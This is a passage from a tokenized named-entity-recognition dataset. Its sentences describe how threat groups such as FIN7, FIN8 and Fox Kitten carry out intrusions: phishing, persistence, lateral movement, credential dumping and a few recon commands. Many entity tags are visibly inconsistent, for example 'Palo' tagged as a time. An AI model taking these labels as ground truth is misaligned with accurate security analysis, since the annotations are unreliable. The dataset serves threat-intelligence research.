"Darkside", - "ransomware", - "with", - "the", - "filename", - "sleep.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "mshta.exe", - "to", - "execute", - "VBScript", - "to", - "execute", - "malicious", - "code", - "on", - "victim", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "port-protocol", - "mismatches", - "on", - "ports", - "such", - "as", - "53,", - "80,", - "443,", - "and", - "8080", - "during", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "used", - "a", - "PowerShell", - "script", - "to", - "launch", - "shellcode", - "that", - "retrieved", - "an", - "additional", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "malware", - "has", - "created", - "Registry", - "Run", - "and", - "RunOnce", - "keys", - "to", - "establish", - "persistence,", - "and", - "has", - "also", - "added", - "items", - "to", - "the", - "Startup", - "folder." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "utilized", - "the", - "remote", - "management", - "tool", - "Atera", - "to", - "download", - "malware", - "to", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "RDP", - "to", - "move", - "laterally", - "in", - "victim", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "actors", - "have", - "mailed", - "USB", - "drives", - "to", - "potential", - "victims", - "containing", - "malware", - "that", - "downloads", - "and", - "installs", - "various", - "backdoors,", - "including", - "in", - "some", - "cases", - "for", - "ransomware", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "`rundll32.exe`", - "to", - "execute", - "malware", - "on", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "SSH", - "to", - "move", - "laterally", - "through", - "victim", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "malware", - "has", - "created", - "scheduled", - "tasks", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "captured", - "screenshots", - "and", - "desktop", - "video", - "recordings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "sent", - "spearphishing", - "emails", - "with", - "either", - "malicious", - "Microsoft", - "Documents", - "or", - "RTF", - "files", - "attached." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "I-SamFile", - "B-SecTeam", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "conducted", - "broad", - "phishing", - "campaigns", - "using", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "the", - "command", - "`cmd.exe", - "/C", - "quser`", - "to", - "collect", - "user", - "session", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "utilized", - "a", - "variety", - "of", - "tools", - "such", - "as", - "Cobalt", - "Strike,", - "PowerSploit,", - "and", - "the", - "remote", - "management", - "tool,", - "Atera", - "for", - "targeting", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "staged", - "legitimate", - "software,", - "that", - "was", - "trojanized", - "to", - "contain", - "an", - "Atera", - "agent", - "installer,", - "on", - "Amazon", - "S3." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "used", - "images", - "embedded", - "into", - "document", - "lures", - "that", - "only", - "activate", - "the", - "payload", - "when", - "a", - "user", - "double", - "clicks", - "to", - "avoid", - "sandboxes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "TightVNC", - "to", - "control", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "harvested", - "valid", - "administrative", - "credentials", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "created", - "a", - "custom", - "video", - "recording", - "capability", - "that", - "could", - "be", - "used", - "to", - "monitor", - "operations", - "in", - "the", - "victim's", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "used", - "VBS", - "scripts", - "to", - "help", - "perform", - "tasks", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "set", - "up", - "Amazon", - "S3", - "buckets", - "to", - "host", - "trojanized", - "digital", - "products." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "used", - "the", - "command", - "prompt", - "to", - "launch", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "has", - "used", - "WMI", - "to", - "install", - "malware", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN7", - "created", - "new", - "Windows", - "services", - "and", - "added", - "them", - "to", - "the", - "startup", - "directories", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "RAR", - "to", - "compress", - "collected", - "data", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "the", - "Plink", - "utility", - "to", - "tunnel", - "RDP", - "back", - "to", - "C2", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Org", - "I-Org", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "injected", - "malicious", - "code", - "into", - "a", - "new", - "svchost.exe", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "cleared", - "logs", - "during", - "post", - "compromise", - "cleanup", - "activities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "an", - "expired", - "open-source", - "X.509", - "certificate", - "for", - "testing", - "in", - "the", - "OpenSSL", - "repository,", - "to", - "connect", - "to", - "actor-controlled", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "environment", - "variables", - "and", - "standard", - "input", - "(stdin)", - "to", - "obfuscate", - "command-line", - "arguments.", - "FIN8", - "also", - "obfuscates", - "malicious", - "macros", - "delivered", - "as", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "deployed", - "ransomware", - "such", - "as", - "Ragnar", - "Locker,", - "White", - "Rabbit,", - "and", - "attempted", - "to", - "execute", - "Noberus", - "on", - "compromised", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "retrieved", - "a", - "list", - "of", - "trusted", - "domains", - "by", - "using", - "<code>nltest.exe", - "/domain_trusts</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "FTP", - "to", - "exfiltrate", - "collected", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "exploited", - "the", - "CVE-2016-0167", - "local", - "vulnerability." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "deleted", - "tmp", - "and", - "prefetch", - "files", - "during", - "post", - "compromise", - "cleanup", - "activities.", - "FIN8", - "has", - "also", - "deleted", - "PowerShell", - "scripts", - "to", - "evade", - "detection", - "on", - "compromised", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "remote", - "code", - "execution", - "to", - "download", - "subsequent", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "the", - "Ping", - "command", - "to", - "check", - "connectivity", - "to", - "actor-controlled", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "harvests", - "credentials", - "using", - "Invoke-Mimikatz", - "or", - "Windows", - "Credentials", - "Editor", - "(WCE)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "malicious", - "e-mail", - "attachments", - "to", - "lure", - "victims", - "into", - "executing", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "emails", - "with", - "malicious", - "links", - "to", - "lure", - "victims", - "into", - "installing", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "deleted", - "Registry", - "keys", - "during", - "post", - "compromise", - "cleanup", - "activities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "FIN8's", - "malicious", - "spearphishing", - "payloads", - "are", - "executed", - "as", - "PowerShell.", - "FIN8", - "has", - "also", - "used", - "PowerShell", - "for", - "lateral", - "movement", - "and", - "credential", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "aggregates", - "staged", - "data", - "from", - "a", - "network", - "into", - "a", - "single", - "location." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "RDP", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "dsquery", - "and", - "other", - "Active", - "Directory", - "utilities", - "to", - "enumerate", - "hosts;", - "they", - "have", - "also", - "used", - "<code>nltest.exe", - "/dclist</code>", - "to", - "retrieve", - "a", - "list", - "of", - "domain", - "controllers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "attempted", - "to", - "map", - "to", - "C$", - "on", - "enumerated", - "hosts", - "to", - "test", - "the", - "scope", - "of", - "their", - "current", - "credentials/context.", - "FIN8", - "has", - "also", - "used", - "smbexec", - "from", - "the", - "Impacket", - "suite", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "scheduled", - "tasks", - "to", - "maintain", - "RDP", - "backdoors." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "Registry", - "keys", - "to", - "detect", - "and", - "avoid", - "executing", - "in", - "potential", - "sandboxes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "distributed", - "targeted", - "emails", - "containing", - "Word", - "documents", - "with", - "embedded", - "malicious", - "macros." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "distributed", - "targeted", - "emails", - "containing", - "links", - "to", - "malicious", - "documents", - "with", - "embedded", - "macros." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "PowerShell", - "Scripts", - "to", - "check", - "the", - "architecture", - "of", - "a", - "compromised", - "machine", - "before", - "the", - "selection", - "of", - "a", - "32-bit", - "or", - "64-bit", - "version", - "of", - "a", - "malicious", - ".NET", - "loader." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "executed", - "the", - "command", - "`quser`", - "to", - "display", - "the", - "session", - "details", - "of", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "a", - "malicious", - "framework", - "designed", - "to", - "impersonate", - "the", - "lsass.exe/vmtoolsd.exe", - "token." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Tool" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "open-source", - "tools", - "such", - "as", - "Impacket", - "for", - "targeting", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "valid", - "accounts", - "for", - "persistence", - "and", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "HTTPS", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "<code>sslip.io</code>,", - "a", - "free", - "IP", - "to", - "domain", - "mapping", - "service", - "that", - "also", - "makes", - "SSL", - "certificate", - "generation", - "easier", - "for", - "traffic", - "encryption,", - "as", - "part", - "of", - "their", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "a", - "Batch", - "file", - "to", - "automate", - "frequently", - "executed", - "post", - "compromise", - "cleanup", - "activities.", - "FIN8", - "has", - "also", - "executed", - "commands", - "remotely", - "via", - "`cmd.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "FIN8's", - "malicious", - "spearphishing", - "payloads", - "use", - "WMI", - "to", - "launch", - "malware", - "and", - "spawn", - "`cmd.exe`", - "execution.", - "FIN8", - "has", - "also", - "used", - "WMIC", - "and", - "the", - "Impacket", - "suite", - "for", - "lateral", - "movement,", - "as", - "well", - "as", - "during", - "and", - "post", - "compromise", - "cleanup", - "activities." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN8", - "has", - "used", - "WMI", - "event", - "subscriptions", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "Kitten", - "has", - "acquired", - "domains", - "imitating", - "legitimate", - "sites." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "Kitten", - "has", - "attempted", - "to", - "convince", - "victims", - "to", - "enable", - "malicious", - "content", - "within", - "a", - "spearphishing", - "email", - "by", - "including", - "an", - "odd", - "decoy", - "message." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "Kitten", - "has", - "named", - "malicious", - "files", - "<code>update.exe</code>", - "and", - "loaded", - "them", - "into", - "the", - "compromise", - "host's", - "“Public”", - "folder." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "Kitten", - "has", - "used", - "right-to-left", - "override", - "to", - "reverse", - "executables’", - "names", - "to", - "make", - "them", - "appear", - "to", - "have", - "different", - "file", - "extensions,", - "rather", - "than", - "their", - "real", - "ones." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "Kitten", - "has", - "conducted", - "spearphishing", - "campaigns", - "containing", - "malicious", - "documents", - "to", - "lure", - "victims", - "to", - "open", - "the", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "Kitten", - "has", - "obtained", - "open", - "source", - "tools", - "for", - "its", - "operations,", - "including", - "JsonCPP", - "and", - "Psiphon." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "sticky", - "keys", - "to", - "launch", - "a", - "command", - "prompt." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "7-Zip", - "to", - "archive", - "data." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "Google", - "Chrome", - "bookmarks", - "to", - "identify", - "internal", - "resources", - "and", - "assets." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "brute", - "forced", - "RDP", - "credentials." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "base64", - "encoded", - "scripts", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "a", - "Perl", - "reverse", - "shell", - "to", - "communicate", - "with", - "C2." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "accessed", - "files", - "to", - "gain", - "valid", - "credentials." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "obtained", - "files", - "from", - "the", - "victim's", - "cloud", - "storage", - "instances." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "accessed", - "victim", - "security", - "and", - "IT", - "environments", - "and", - "Microsoft", - "Teams", - "to", - "mine", - "valuable", - "information." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SecTeam", - "I-SecTeam", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "searched", - "local", - "system", - "resources", - "to", - "access", - "sensitive", - "documents." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "searched", - "network", - "shares", - "to", - "access", - "sensitive", - "documents." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "the", - "Softerra", - "LDAP", - "browser", - "to", - "browse", - "documentation", - "on", - "service", - "accounts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "base64", - "encoded", - "payloads", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "created", - "KeyBase", - "accounts", - "to", - "communicate", - "with", - "ransomware", - "victims." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "exploited", - "known", - "vulnerabilities", - "in", - "Fortinet,", - "PulseSecure,", - "and", - "Palo", - "Alto", - "VPN", - "appliances." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Time", - "B-SecTeam", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "exploited", - "known", - "vulnerabilities", - "in", - "remote", - "services", - "including", - "RDP." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "WizTree", - "to", - "obtain", - "network", - "files", - "and", - "directory", - "listings." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "downloaded", - "additional", - "tools", - "including", - "PsExec", - "directly", - "to", - "endpoints." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "used", - "prodump", - "to", - "dump", - "credentials", - "from", - "LSASS." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "accessed", - "ntuser.dat", - "and", - "UserClass.dat", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "created", - "a", - "local", - "user", - "account", - "with", - "administrator", - "privileges." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-OffAct", - "B-Purp", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fox", - "Kitten", - "has", - "named", - "the", - "task", - "for", - "a", - "reverse", - "proxy", - "lpupdate", - "to", - "appear", - 